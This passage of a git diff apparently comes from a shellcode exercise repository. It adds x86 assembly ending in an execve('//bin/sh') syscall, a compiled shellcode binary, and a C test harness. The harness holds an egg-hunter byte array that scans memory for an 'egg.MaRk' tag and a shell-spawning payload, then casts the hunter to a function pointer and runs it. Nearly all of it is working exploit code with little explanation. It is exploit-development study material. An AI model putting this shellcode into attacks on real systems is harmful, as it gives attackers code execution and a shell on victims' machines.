+ ; ECX
+ push edx ; NULL termination of a stack
+ push ebx ; load our '//bin/sh' on a stack
+ mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+ ; EDX
+ push edx ; NULL terminator
+ mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
+ int 0x80
+
diff --git a/exam3/basic/shellcode b/exam3/basic/shellcode
new file mode 100755
index 0000000..bb8215c
Binary files /dev/null and b/exam3/basic/shellcode differ
diff --git a/exam3/basic/shellcode.c b/exam3/basic/shellcode.c
new file mode 100644
index 0000000..feaf2d7
--- /dev/null
+++ b/exam3/basic/shellcode.c
@@ -0,0 +1,18 @@
+#include
+#include
+
+unsigned char hunter[] = "\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x4d\x61\x52\x6b\x75\xed\xff\xd0";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x65\x67\x67\x2e\x4d\x61\x52\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+}